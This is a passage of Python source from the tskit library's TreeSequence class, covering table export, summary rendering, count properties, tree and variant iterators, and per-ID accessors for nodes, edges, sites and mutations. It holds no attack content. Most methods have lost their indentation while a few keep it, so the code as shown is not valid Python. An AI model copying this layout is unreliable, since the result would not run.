                        derived_state=mutation.derived_state,
                        parent=mutation.parent,
                        metadata=metadata,
                    )
                    print(row, file=mutations)
        # Individual table. Location coordinates are joined with commas.
        # NOTE(review): the `parents` column is not written here even though
        # parse_individuals can read one — confirm whether round-tripping
        # parents is required.
        if individuals is not None:
            print("id", "flags", "location", "metadata", sep="\t", file=individuals)
            for individual in self.individuals():
                metadata = individual.metadata
                if base64_metadata:
                    metadata = base64.b64encode(metadata).decode(encoding)
                location = ",".join(map(str, individual.location))
                row = ("{id}\t" "{flags}\t" "{location}\t" "{metadata}").format(
                    id=individual.id,
                    flags=individual.flags,
                    location=location,
                    metadata=metadata,
                )
                print(row, file=individuals)
        # Population table.
        if populations is not None:
            print("id", "metadata", sep="\t", file=populations)
            for population in self.populations():
                metadata = population.metadata
                if base64_metadata:
                    metadata = base64.b64encode(metadata).decode(encoding)
                row = ("{id}\t" "{metadata}").format(
                    id=population.id, metadata=metadata
                )
                print(row, file=populations)
        # Provenance table: records are written as-is (no Base64 handling).
        if provenances is not None:
            print("id", "timestamp", "record", sep="\t", file=provenances)
            for provenance in self.provenances():
                row = ("{id}\t" "{timestamp}\t" "{record}\t").format(
                    id=provenance.id,
                    timestamp=provenance.timestamp,
                    record=provenance.record,
                )
                print(row, file=provenances)
    def __str__(self):
        """Render a plain-text summary: headline figures plus a per-table
        row/size/metadata overview."""
        ts_rows = [
            ["Trees", str(self.num_trees)],
            ["Sequence Length", str(self.sequence_length)],
            ["Sample Nodes", str(self.num_samples)],
            ["Total Size", util.naturalsize(self.nbytes)],
        ]
        header = ["Table", "Rows", "Size", "Has Metadata"]
        table_rows = []
        for name, table in self.tables.name_map.items():
            # Tables without a metadata column (no `metadata` attribute)
            # report "No", as do those whose metadata column is empty.
            table_rows.append(
                [
                    str(s)
                    for s in [
                        name.capitalize(),
                        table.num_rows,
                        util.naturalsize(table.nbytes),
                        "Yes"
                        if hasattr(table, "metadata") and len(table.metadata) > 0
                        else "No",
                    ]
                ]
            )
        return util.unicode_table(ts_rows, title="TreeSequence") + util.unicode_table(
            table_rows, header=header
        )
def _repr_html_(self):
"""
Called by jupyter notebooks to render a TreeSequence
"""
return util.tree_sequence_html(self)
# num_samples was originally called sample_size, and so we must keep sample_size
# around as a deprecated alias.
@property
def num_samples(self):
"""
Returns the number of samples in this tree sequence. This is the number
of sample nodes in each tree.
:return: The number of sample nodes in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_samples()
@property
def table_metadata_schemas(self) -> "_TableMetadataSchemas":
"""
The set of metadata schemas for the tables in this tree sequence.
"""
return self._table_metadata_schemas
@property
def sample_size(self):
# Deprecated alias for num_samples
return self.num_samples
def get_sample_size(self):
# Deprecated alias for num_samples
return self.num_samples
@property
def file_uuid(self):
return self._ll_tree_sequence.get_file_uuid()
@property
def sequence_length(self):
"""
Returns the sequence length in this tree sequence. This defines the
genomic scale over which tree coordinates are defined. Given a
tree sequence with a sequence length :math:`L`, the constituent
trees will be defined over the half-closed interval
:math:`[0, L)`. Each tree then covers some subset of this
interval --- see :attr:`tskit.Tree.interval` for details.
:return: The length of the sequence in this tree sequence in bases.
:rtype: float
"""
return self.get_sequence_length()
def get_sequence_length(self):
return self._ll_tree_sequence.get_sequence_length()
@property
def metadata(self) -> Any:
"""
The decoded metadata for this TreeSequence.
"""
return self.metadata_schema.decode_row(self._ll_tree_sequence.get_metadata())
@property
def metadata_schema(self) -> metadata_module.MetadataSchema:
"""
The :class:`tskit.MetadataSchema` for this TreeSequence.
"""
return metadata_module.parse_metadata_schema(
self._ll_tree_sequence.get_metadata_schema()
)
@property
def num_edges(self):
"""
Returns the number of :ref:`edges <sec_edge_table_definition>` in this
tree sequence.
:return: The number of edges in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_edges()
def get_num_trees(self):
# Deprecated alias for self.num_trees
return self.num_trees
@property
def num_trees(self):
"""
Returns the number of distinct trees in this tree sequence. This
is equal to the number of trees returned by the :meth:`.trees`
method.
:return: The number of trees in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_trees()
def get_num_sites(self):
# Deprecated alias for self.num_sites
return self._ll_tree_sequence.get_num_sites()
@property
def num_sites(self):
"""
Returns the number of :ref:`sites <sec_site_table_definition>` in
this tree sequence.
:return: The number of sites in this tree sequence.
:rtype: int
"""
return self.get_num_sites()
def get_num_mutations(self):
# Deprecated alias for self.num_mutations
return self.num_mutations
@property
def num_mutations(self):
"""
Returns the number of :ref:`mutations <sec_mutation_table_definition>`
in this tree sequence.
:return: The number of mutations in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_mutations()
def get_num_nodes(self):
# Deprecated alias for self.num_nodes
return self.num_nodes
@property
def num_individuals(self):
"""
Returns the number of :ref:`individuals <sec_individual_table_definition>` in
this tree sequence.
:return: The number of individuals in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_individuals()
@property
def num_nodes(self):
"""
Returns the number of :ref:`nodes <sec_node_table_definition>` in
this tree sequence.
:return: The number of nodes in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_nodes()
@property
def num_provenances(self):
"""
Returns the number of :ref:`provenances <sec_provenance_table_definition>`
in this tree sequence.
:return: The number of provenances in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_provenances()
@property
def num_populations(self):
"""
Returns the number of :ref:`populations <sec_population_table_definition>`
in this tree sequence.
:return: The number of populations in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_populations()
@property
def num_migrations(self):
"""
Returns the number of :ref:`migrations <sec_migration_table_definition>`
in this tree sequence.
:return: The number of migrations in this tree sequence.
:rtype: int
"""
return self._ll_tree_sequence.get_num_migrations()
@property
def max_root_time(self):
"""
Returns the time of the oldest root in any of the trees in this tree sequence.
This is usually equal to ``np.max(ts.tables.nodes.time)`` but may not be
since there can be non-sample nodes that are not present in any tree. Note that
isolated samples are also defined as roots (so there can be a max_root_time
even in a tree sequence with no edges).
:return: The maximum time of a root in this tree sequence.
:rtype: float
:raises ValueError: If there are no samples in the tree, and hence no roots (as
roots are defined by the ends of the upward paths from the set of samples).
"""
if self.num_samples == 0:
raise ValueError(
"max_root_time is not defined in a tree sequence with 0 samples"
)
ret = max(self.node(u).time for u in self.samples())
if self.num_edges > 0:
# Edges are guaranteed to be listed in parent-time order, so we can get the
# last one to get the oldest root
edge = self.edge(self.num_edges - 1)
# However, we can have situations where there is a sample older than a
# 'proper' root
ret = max(ret, self.node(edge.parent).time)
return ret
def migrations(self):
"""
Returns an iterable sequence of all the
:ref:`migrations <sec_migration_table_definition>` in this tree sequence.
Migrations are returned in nondecreasing order of the ``time`` value.
:return: An iterable sequence of all migrations.
:rtype: Sequence(:class:`.Migration`)
"""
return SimpleContainerSequence(self.migration, self.num_migrations)
def individuals(self):
"""
Returns an iterable sequence of all the
:ref:`individuals <sec_individual_table_definition>` in this tree sequence.
:return: An iterable sequence of all individuals.
:rtype: Sequence(:class:`.Individual`)
"""
return SimpleContainerSequence(self.individual, self.num_individuals)
def nodes(self):
"""
Returns an iterable sequence of all the :ref:`nodes <sec_node_table_definition>`
in this tree sequence.
:return: An iterable sequence of all nodes.
:rtype: Sequence(:class:`.Node`)
"""
return SimpleContainerSequence(self.node, self.num_nodes)
def edges(self):
"""
Returns an iterable sequence of all the :ref:`edges <sec_edge_table_definition>`
in this tree sequence. Edges are returned in the order required
for a :ref:`valid tree sequence <sec_valid_tree_sequence_requirements>`. So,
edges are guaranteed to be ordered such that (a) all parents with a
given ID are contiguous; (b) edges are returned in non-descreasing
order of parent time ago; (c) within the edges for a given parent, edges
are sorted first by child ID and then by left coordinate.
:return: An iterable sequence of all edges.
:rtype: Sequence(:class:`.Edge`)
"""
return SimpleContainerSequence(self.edge, self.num_edges)
    def edgesets(self):
        """
        Returns a generator over the "edgesets" in this tree sequence, where an
        edgeset records a parent together with its full (sorted) set of children
        over a maximal genomic interval on which that child set is unchanged.
        NOTE(review): inferred from the construction below — confirm against the
        ``Edgeset`` definition elsewhere in this file.
        """
        # TODO the order that these records are returned in is not well specified.
        # Hopefully this does not matter, and we can just state that the ordering
        # should not be depended on.
        children = collections.defaultdict(set)  # parent -> current child set
        active_edgesets = {}  # parent -> Edgeset currently being extended
        for (left, right), edges_out, edges_in in self.edge_diffs():
            # Complete and return any edgesets that are affected by this tree
            # transition
            parents = iter(edge.parent for edge in itertools.chain(edges_out, edges_in))
            for parent in parents:
                if parent in active_edgesets:
                    # The child set of this parent changes at this breakpoint,
                    # so the open edgeset ends at the current interval's left.
                    edgeset = active_edgesets.pop(parent)
                    edgeset.right = left
                    edgeset.children = sorted(children[parent])
                    yield edgeset
            # Apply the diff: removals first, then insertions.
            for edge in edges_out:
                children[edge.parent].remove(edge.child)
            for edge in edges_in:
                children[edge.parent].add(edge.child)
            # Update the active edgesets
            for edge in itertools.chain(edges_out, edges_in):
                if (
                    len(children[edge.parent]) > 0
                    and edge.parent not in active_edgesets
                ):
                    active_edgesets[edge.parent] = Edgeset(left, right, edge.parent, [])
        # Flush any edgesets still open at the end of the sequence.
        for parent in active_edgesets.keys():
            edgeset = active_edgesets[parent]
            edgeset.right = self.sequence_length
            edgeset.children = sorted(children[edgeset.parent])
            yield edgeset
def edge_diffs(self, include_terminal=False):
"""
Returns an iterator over all the edges that are inserted and removed to
build the trees as we move from left-to-right along the tree sequence.
Each iteration yields a named tuple consisting of 3 values,
``(interval, edges_out, edges_in)``. The first value, ``interval``, is the
genomic interval ``(left, right)`` covered by the incoming tree
(see :attr:`Tree.interval`). The second, ``edges_out`` is a list of the edges
that were just-removed to create the tree covering the interval
(hence ``edges_out`` will always be empty for the first tree). The last value,
``edges_in``, is a list of edges that were just
inserted to construct the tree covering the current interval.
The edges returned within each ``edges_in`` list are ordered by ascending
time of the parent node, then ascending parent id, then ascending child id.
The edges within each ``edges_out`` list are the reverse order (e.g.
descending parent time, parent id, then child_id). This means that within
each list, edges with the same parent appear consecutively.
:param bool include_terminal: If False (default), the iterator terminates
after the final interval in the tree sequence (i.e. it does not
report a final removal of all remaining edges), and the number
of iterations will be equal to the number of trees in the tree
sequence. If True, an additional iteration takes place, with the last
``edges_out`` value reporting all the edges contained in the final
tree (with both ``left`` and ``right`` equal to the sequence length).
:return: An iterator over the (interval, edges_out, edges_in) tuples. This
is a named tuple, so the 3 values can be accessed by position
(e.g. ``returned_tuple[0]``) or name (e.g. ``returned_tuple.interval``).
:rtype: :class:`collections.abc.Iterable`
"""
iterator = _tskit.TreeDiffIterator(self._ll_tree_sequence, include_terminal)
metadata_decoder = self.table_metadata_schemas.edge.decode_row
for interval, edge_tuples_out, edge_tuples_in in iterator:
edges_out = [
Edge(*e, metadata_decoder=metadata_decoder) for e in edge_tuples_out
]
edges_in = [
Edge(*e, metadata_decoder=metadata_decoder) for e in edge_tuples_in
]
yield EdgeDiff(Interval(*interval), edges_out, edges_in)
def sites(self):
"""
Returns an iterable sequence of all the :ref:`sites <sec_site_table_definition>`
in this tree sequence. Sites are returned in order of increasing ID
(and also position). See the :class:`Site` class for details on
the available fields for each site.
:return: An iterable sequence of all sites.
:rtype: Sequence(:class:`.Site`)
"""
return SimpleContainerSequence(self.site, self.num_sites)
def mutations(self):
"""
Returns an iterator over all the
:ref:`mutations <sec_mutation_table_definition>` in this tree sequence.
Mutations are returned in order of nondecreasing site ID.
See the :class:`Mutation` class for details on the available fields for
each mutation.
The returned iterator is equivalent to iterating over all sites
and all mutations in each site, i.e.::
>>> for site in tree_sequence.sites():
>>> for mutation in site.mutations:
>>> yield mutation
:return: An iterator over all mutations in this tree sequence.
:rtype: iter(:class:`Mutation`)
"""
for site in self.sites():
yield from site.mutations
def populations(self):
"""
Returns an iterable sequence of all the
:ref:`populations <sec_population_table_definition>` in this tree sequence.
:return: An iterable sequence of all populations.
:rtype: Sequence(:class:`.Population`)
"""
return SimpleContainerSequence(self.population, self.num_populations)
def provenances(self):
"""
Returns an iterable sequence of all the
:ref:`provenances <sec_provenance_table_definition>` in this tree sequence.
:return: An iterable sequence of all provenances.
:rtype: Sequence(:class:`.Provenance`)
"""
return SimpleContainerSequence(self.provenance, self.num_provenances)
def breakpoints(self, as_array=False):
"""
Returns the breakpoints along the chromosome, including the two extreme points
0 and L. This is equivalent to
>>> iter([0] + [t.interval.right for t in self.trees()])
By default we return an iterator over the breakpoints as Python float objects;
if ``as_array`` is True we return them as a numpy array.
Note that the ``as_array`` form will be more efficient and convenient in most
cases; the default iterator behaviour is mainly kept to ensure compatability
with existing code.
:param bool as_array: If True, return the breakpoints as a numpy array.
:return: The breakpoints defined by the tree intervals along the sequence.
:rtype: collections.abc.Iterable or numpy.ndarray
"""
breakpoints = self.ll_tree_sequence.get_breakpoints()
if not as_array:
# Convert to Python floats for backward compatibility.
breakpoints = map(float, breakpoints)
return breakpoints
def at(self, position, **kwargs):
"""
Returns the tree covering the specified genomic location. The returned tree
will have ``tree.interval.left`` <= ``position`` < ``tree.interval.right``.
See also :meth:`Tree.seek`.
:param float position: A genomic location.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.at(2.5, sample_lists=True)`` will
result in a :class:`Tree` created with ``sample_lists=True``.
:return: A new instance of :class:`Tree` positioned to cover the specified
genomic location.
:rtype: Tree
"""
tree = Tree(self, **kwargs)
tree.seek(position)
return tree
def at_index(self, index, **kwargs):
"""
Returns the tree at the specified index. See also :meth:`Tree.seek_index`.
:param int index: The index of the required tree.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.at_index(4, sample_lists=True)``
will result in a :class:`Tree` created with ``sample_lists=True``.
:return: A new instance of :class:`Tree` positioned at the specified index.
:rtype: Tree
"""
tree = Tree(self, **kwargs)
tree.seek_index(index)
return tree
def first(self, **kwargs):
"""
Returns the first tree in this :class:`TreeSequence`. To iterate over all
trees in the sequence, use the :meth:`.trees` method.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.first(sample_lists=True)`` will
result in a :class:`Tree` created with ``sample_lists=True``.
:return: The first tree in this tree sequence.
:rtype: :class:`Tree`.
"""
tree = Tree(self, **kwargs)
tree.first()
return tree
def last(self, **kwargs):
"""
Returns the last tree in this :class:`TreeSequence`. To iterate over all
trees in the sequence, use the :meth:`.trees` method.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned :class:`Tree`. For example ``ts.first(sample_lists=True)`` will
result in a :class:`Tree` created with ``sample_lists=True``.
:return: The last tree in this tree sequence.
:rtype: :class:`Tree`.
"""
tree = Tree(self, **kwargs)
tree.last()
return tree
    def trees(
        self,
        tracked_samples=None,
        *,
        sample_lists=False,
        root_threshold=1,
        sample_counts=None,
        tracked_leaves=None,
        leaf_counts=None,
        leaf_lists=None,
    ):
        """
        Returns an iterator over the trees in this tree sequence. Each value
        returned in this iterator is an instance of :class:`Tree`. Upon
        successful termination of the iterator, the tree will be in the
        "cleared" null state.

        The ``sample_lists`` and ``tracked_samples`` parameters are passed
        to the :class:`Tree` constructor, and control
        the options that are set in the returned tree instance.

        :warning: Do not store the results of this iterator in a list!
            For performance reasons, the same underlying object is used
            for every tree returned which will most likely lead to unexpected
            behaviour. If you wish to obtain a list of trees in a tree sequence
            please use ``ts.aslist()`` instead.

        :param list tracked_samples: The list of samples to be tracked and
            counted using the :meth:`Tree.num_tracked_samples` method.
        :param bool sample_lists: If True, provide more efficient access
            to the samples beneath a give node using the
            :meth:`Tree.samples` method.
        :param int root_threshold: The minimum number of samples that a node
            must be ancestral to for it to be in the list of roots. By default
            this is 1, so that isolated samples (representing missing data)
            are roots. To efficiently restrict the roots of the tree to
            those subtending meaningful topology, set this to 2. This value
            is only relevant when trees have multiple roots.
        :param bool sample_counts: Deprecated since 0.2.4.
        :return: An iterator over the Trees in this tree sequence.
        :rtype: collections.abc.Iterable, :class:`Tree`
        """
        # tracked_leaves, leaf_counts and leaf_lists are deprecated aliases
        # for tracked_samples, sample_counts and sample_lists respectively.
        # These are left over from an older version of the API when leaves
        # and samples were synonymous.
        if tracked_leaves is not None:
            tracked_samples = tracked_leaves
        if leaf_counts is not None:
            sample_counts = leaf_counts
        if leaf_lists is not None:
            sample_lists = leaf_lists
        # A single Tree instance is reused for the whole iteration -- see the
        # warning in the docstring above about storing the yielded trees.
        tree = Tree(
            self,
            tracked_samples=tracked_samples,
            sample_lists=sample_lists,
            root_threshold=root_threshold,
            sample_counts=sample_counts,
        )
        return TreeIterator(tree)
    def coiterate(self, other, **kwargs):
        """
        Returns an iterator over the pairs of trees for each distinct
        interval in the specified pair of tree sequences.

        :param TreeSequence other: The other tree sequence from which to take trees. The
            sequence length must be the same as the current tree sequence.
        :param \\**kwargs: Further named arguments that will be passed to the
            :meth:`.trees` method when constructing the returned trees.
        :return: An iterator returning successive tuples of the form
            ``(interval, tree_self, tree_other)``. For example, the first item returned
            will consist of an tuple of the initial interval, the first tree of the
            current tree sequence, and the first tree of the ``other`` tree sequence;
            the ``.left`` attribute of the initial interval will be 0 and the ``.right``
            attribute will be the smallest non-zero breakpoint of the 2 tree sequences.
        :rtype: iter(:class:`Interval`, :class:`Tree`, :class:`Tree`)
        """
        if self.sequence_length != other.sequence_length:
            raise ValueError("Tree sequences must be of equal sequence length.")
        L = self.sequence_length
        trees1 = self.trees(**kwargs)
        trees2 = other.trees(**kwargs)
        tree1 = next(trees1)
        tree2 = next(trees2)
        right = 0
        # Walk both sequences in lock-step: each yielded interval ends at the
        # nearest breakpoint of either sequence.  The loop terminates exactly
        # when that breakpoint reaches the (shared) sequence length L.
        while right != L:
            left = right
            right = min(tree1.interval.right, tree2.interval.right)
            yield Interval(left, right), tree1, tree2
            # Advance
            # next(..., None) only returns None when an iterator is exhausted,
            # which can only happen on the final interval (right == L), so the
            # interval accesses above never see a None tree.
            if tree1.interval.right == right:
                tree1 = next(trees1, None)
            if tree2.interval.right == right:
                tree2 = next(trees2, None)
def haplotypes(
self,
*,
isolated_as_missing=None,
missing_data_character="-",
impute_missing_data=None,
):
"""
Returns an iterator over the strings of haplotypes that result from
the trees and mutations in this tree sequence. Each haplotype string
is guaranteed to be of the same length. A tree sequence with
:math:`n` samples and :math:`s` sites will return a total of :math:`n`
strings of :math:`s` alleles concatenated together, where an allele
consists of a single ascii character (tree sequences that include alleles
which are not a single character in length, or where the character is
non-ascii, will raise an error). The first string returned is the
haplotype for sample ``0``, and so on.
The alleles at each site must be represented by single byte characters,
(i.e. variants must be single nucleotide polymorphisms, or SNPs), hence
the strings returned will all be of length :math:`s`, and for a haplotype
``h``, the value of ``h[j]`` will be the observed allelic state
at site ``j``.
If ``isolated_as_missing`` is True (the default), isolated samples without
mutations directly above them will be treated as
:ref:`missing data<sec_data_model_missing_data>` and will be
represented in the string by the ``missing_data_character``. If
instead it is set to False, missing data will be assigned the ancestral state
(unless they have mutations directly above them, in which case they will take
the most recent derived mutational state for that node). This was the default
behaviour in versions prior to 0.2.0. Prior to 0.3.0 the `impute_missing_data`
argument controlled this behaviour.
See also the :meth:`.variants` iterator for site-centric access
to sample genotypes.
.. warning::
For large datasets, this method can consume a **very large** amount of
memory! To output all the sample data, it is more efficient to iterate
over sites rather than over samples. If you have a large dataset but only
want to output the haplotypes for a subset of samples, it may be worth
calling :meth:`.simplify` to reduce tree sequence down to the required
samples before outputting haplotypes.
:return: An iterator over the haplotype strings for the samples in
this tree sequence.
:param bool isolated_as_missing: If True, the allele assigned to
missing samples (i.e., isolated samples without mutations) is
the ``missing_data_character``. If False,
missing samples will be assigned the ancestral state.
Default: True.
:param str missing_data_character: A single ascii character that will
be used to represent missing data.
If any normal allele contains this character, an error is raised.
Default: '-'.
:param bool impute_missing_data:
*Deprecated in 0.3.0. Use ``isolated_as_missing``, but inverting value.
Will be removed in a future version*
:rtype: collections.abc.Iterable
:raises: TypeError if the ``missing_data_character`` or any of the alleles
at a site or the are not a single ascii character.
:raises: ValueError
if the ``missing_data_character`` exists in one of the alleles
"""
if impute_missing_data is not None:
warnings.warn(
"The impute_missing_data parameter was deprecated in 0.3.0 and will"
" be removed. Use ``isolated_as_missing=False`` instead of"
"``impute_missing_data=True``.",
FutureWarning,
)
# Only use impute_missing_data if isolated_as_missing has the default value
if isolated_as_missing is None:
isolated_as_missing = not impute_missing_data
H = np.empty((self.num_samples, self.num_sites), dtype=np.int8)
missing_int8 = ord(missing_data_character.encode("ascii"))
for var in self.variants(isolated_as_missing=isolated_as_missing):
alleles = np.full(len(var.alleles), missing_int8, dtype=np.int8)
for i, allele in enumerate(var.alleles):
if allele is not None:
if len(allele) != 1:
raise TypeError(
"Multi-letter allele or deletion detected at site {}".format(
var.site.id
)
)
try:
ascii_allele = allele.encode("ascii")
except UnicodeEncodeError:
raise TypeError(
"Non-ascii character in allele at site {}".format(
var.site.id
)
)
allele_int8 = ord(ascii_allele)
if allele_int8 == missing_int8:
raise ValueError(
"The missing data character '{}' clashes with an "
"existing allele at site {}".format(
missing_data_character, var.site.id
)
)
alleles[i] = allele_int8
H[:, var.site.id] = alleles[var.genotypes]
for h in H:
yield h.tobytes().decode("ascii")
def variants(
self,
*,
as_bytes=False,
samples=None,
isolated_as_missing=None,
alleles=None,
impute_missing_data=None,
):
"""
Returns an iterator over the variants in this tree sequence. See the
:class:`Variant` class for details on the fields of each returned
object. The ``genotypes`` for the variants are numpy arrays,
corresponding to indexes into the ``alleles`` attribute in the
:class:`Variant` object. By default, the ``alleles`` for each
site are generated automatically, such that the ancestral state
is at the zeroth index and subsequent alleles are listed in no
particular order. This means that the encoding of alleles in
terms of genotype values can vary from site-to-site, which is
sometimes inconvenient. It is possible to specify a fixed mapping
from allele strings to genotype values using the ``alleles``
parameter. For example, if we set ``alleles=("A", "C", "G", "T")``,
this will map allele "A" to 0, "C" to 1 and so on (the
:data:`ALLELES_ACGT` constant provides a shortcut for this
common mapping).
By default, genotypes are generated for all samples. The ``samples``
parameter allows us to specify the nodes for which genotypes are
generated; output order of genotypes in the returned variants
corresponds to the order of the samples in this list. It is also
possible to provide **non-sample** nodes as an argument here, if you
wish to generate genotypes for (e.g.) internal nodes. However,
``isolated_as_missing`` must be False in this case, as it is not
possible to detect missing data for non-sample nodes.
If isolated samples are present at a given site without mutations above them,
they will be interpreted as :ref:`missing data<sec_data_model_missing_data>`
the genotypes array will contain a special value :data:`MISSING_DATA`
(-1) to identify these missing samples, and the ``alleles`` tuple will
end with the value ``None`` (note that this is true whether we specify
a fixed mapping using the ``alleles`` parameter or not).
See the :class:`Variant` class for more details on how missing data is
reported.
Such samples are treated as missing data by default, but if
``isolated_as_missing`` is set to to False, they will not be treated as
missing, and so assigned the ancestral state.
This was the default behaviour in versions prior to 0.2.0. Prior to 0.3.0
the `impute_missing_data` argument controlled this behaviour.
.. note::
The ``as_bytes`` parameter is kept as a compatibility
option for older code. It is not the recommended way of
accessing variant data, and will be deprecated in a later
release.
:param bool as_bytes: If True, the genotype values will be returned
as a Python bytes object. Legacy use only.
:param array_like samples: An array of node IDs for which to generate
genotypes, or None for all sample nodes. Default: None.
:param bool isolated_as_missing: If True, the allele assigned to
missing samples (i.e., isolated samples without mutations) is
the ``missing_data_character``. If False, missing samples will be
assigned the ancestral state.
Default: True.
:param tuple alleles: A tuple of strings defining the encoding of
alleles as integer genotype values. At least one allele must be provided.
If duplicate alleles are provided, output genotypes will always be
encoded as the first occurance of the allele. If None (the default),
the alleles are encoded as they are encountered during genotype
generation.
:param bool impute_missing_data:
*Deprecated in 0.3.0. Use ``isolated_as_missing``, but inverting value.
Will be removed in a future version*
:return: An iterator of all variants this tree sequence.
:rtype: iter(:class:`Variant`)
"""
if impute_missing_data is not None:
warnings.warn(
"The impute_missing_data parameter was deprecated in 0.3.0 and will"
" be removed. Use ``isolated_as_missing=False`` instead of"
"``impute_missing_data=True``.",
FutureWarning,
)
# Only use impute_missing_data if isolated_as_missing has the default value
if isolated_as_missing is None:
isolated_as_missing = not impute_missing_data
# See comments for the Variant type for discussion on why the
# present form was chosen.
iterator = _tskit.VariantGenerator(
self._ll_tree_sequence,
samples=samples,
isolated_as_missing=isolated_as_missing,
alleles=alleles,
)
for site_id, genotypes, alleles in iterator:
site = self.site(site_id)
if as_bytes:
if any(len(allele) > 1 for allele in alleles):
raise ValueError(
"as_bytes only supported for single-letter alleles"
)
bytes_genotypes = np.empty(self.num_samples, dtype=np.uint8)
lookup = np.array([ord(a[0]) for a in alleles], dtype=np.uint8)
bytes_genotypes[:] = lookup[genotypes]
genotypes = bytes_genotypes.tobytes()
yield Variant(site, alleles, genotypes)
def genotype_matrix(
self, *, isolated_as_missing=None, alleles=None, impute_missing_data=None
):
"""
Returns an :math:`m \\times n` numpy array of the genotypes in this
tree sequence, where :math:`m` is the number of sites and :math:`n`
the number of samples. The genotypes are the indexes into the array
of ``alleles``, as described for the :class:`Variant` class.
If isolated samples are present at a given site without mutations above them,
they will be interpreted as :ref:`missing data<sec_data_model_missing_data>`
the genotypes array will contain a special value :data:`MISSING_DATA`
(-1) to identify these missing samples.
Such samples are treated as missing data by default, but if
``isolated_as_missing`` is set to to False, they will not be treated as missing,
and so assigned the ancestral state. This was the default behaviour in
versions prior to 0.2.0. Prior to 0.3.0 the `impute_missing_data`
argument controlled this behaviour.
.. warning::
This method can consume a **very large** amount of memory! If
all genotypes are not needed at once, it is usually better to
access them sequentially using the :meth:`.variants` iterator.
:param bool isolated_as_missing: If True, the allele assigned to
missing samples (i.e., isolated samples without mutations) is
the ``missing_data_character``. If False, missing samples will be
assigned the ancestral state.
Default: True.
:param tuple alleles: A tuple of strings describing the encoding of
alleles to genotype values. At least one allele must be provided.
If duplicate alleles are provided, output genotypes will always be
encoded as the first occurance of the allele. If None (the default),
the alleles are encoded as they are encountered during genotype
generation.
:param bool impute_missing_data:
*Deprecated in 0.3.0. Use ``isolated_as_missing``, but inverting value.
Will be removed in a future version*
:return: The full matrix of genotypes.
:rtype: numpy.ndarray (dtype=np.int8)
"""
if impute_missing_data is not None:
warnings.warn(
"The impute_missing_data parameter was deprecated in 0.3.0 and will"
" be removed. Use ``isolated_as_missing=False`` instead of"
"``impute_missing_data=True``.",
FutureWarning,
)
# Only use impute_missing_data if isolated_as_missing has the default value
if isolated_as_missing is None:
isolated_as_missing = not impute_missing_data
return self._ll_tree_sequence.get_genotype_matrix(
isolated_as_missing=isolated_as_missing, alleles=alleles
)
def individual(self, id_):
"""
Returns the :ref:`individual <sec_individual_table_definition>`
in this tree sequence with the specified ID.
:rtype: :class:`Individual`
"""
(
flags,
location,
parents,
metadata,
nodes,
) = self._ll_tree_sequence.get_individual(id_)
return Individual(
id=id_,
flags=flags,
location=location,
parents=parents,
metadata=metadata,
nodes=nodes,
metadata_decoder=self.table_metadata_schemas.individual.decode_row,
)
def node(self, id_):
"""
Returns the :ref:`node <sec_node_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Node`
"""
(
flags,
time,
population,
individual,
metadata,
) = self._ll_tree_sequence.get_node(id_)
return Node(
id=id_,
flags=flags,
time=time,
population=population,
individual=individual,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.node.decode_row,
)
def edge(self, id_):
"""
Returns the :ref:`edge <sec_edge_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Edge`
"""
left, right, parent, child, metadata = self._ll_tree_sequence.get_edge(id_)
return Edge(
id=id_,
left=left,
right=right,
parent=parent,
child=child,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.edge.decode_row,
)
def _tree_node_edges(self):
"""
Return a generator over the trees in the tree sequence, yielding a numpy array
that maps the node IDs in the tree to the ID of the edge above them.
Currently this is a private, non-optimised Python implementation.
"""
node_edges = np.full(self.num_nodes, NULL, dtype=np.int32)
for _, edges_out, edges_in in self.edge_diffs():
for e in edges_out:
node_edges[e.child] = NULL
for e in edges_in:
node_edges[e.child] = e.id
yield node_edges
def migration(self, id_):
"""
Returns the :ref:`migration <sec_migration_table_definition>` in this tree
sequence with the specified ID.
:rtype: :class:`.Migration`
"""
(
left,
right,
node,
source,
dest,
time,
metadata,
) = self._ll_tree_sequence.get_migration(id_)
return Migration(
id=id_,
left=left,
right=right,
node=node,
source=source,
dest=dest,
time=time,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.migration.decode_row,
)
def mutation(self, id_):
"""
Returns the :ref:`mutation <sec_mutation_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Mutation`
"""
(
site,
node,
derived_state,
parent,
metadata,
time,
) = self._ll_tree_sequence.get_mutation(id_)
return Mutation(
id=id_,
site=site,
node=node,
derived_state=derived_state,
parent=parent,
metadata=metadata,
time=time,
metadata_decoder=self.table_metadata_schemas.mutation.decode_row,
)
def site(self, id_):
"""
Returns the :ref:`site <sec_site_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Site`
"""
ll_site = self._ll_tree_sequence.get_site(id_)
pos, ancestral_state, ll_mutations, _, metadata = ll_site
mutations = [self.mutation(mut_id) for mut_id in ll_mutations]
return Site(
id=id_,
position=pos,
ancestral_state=ancestral_state,
mutations=mutations,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.site.decode_row,
)
def population(self, id_):
"""
Returns the :ref:`population <sec_population_table_definition>`
in this tree sequence with the specified ID.
:rtype: :class:`Population`
"""
(metadata,) = self._ll_tree_sequence.get_population(id_)
return Population(
id=id_,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.population.decode_row,
)
def provenance(self, id_):
timestamp, record = self._ll_tree_sequence.get_provenance(id_)
return Provenance(id=id_, timestamp=timestamp, record=record)
def get_samples(self, population_id=None):
# Deprecated alias for samples()
return self.samples(population_id)
def samples(self, population=None, population_id=None):
"""
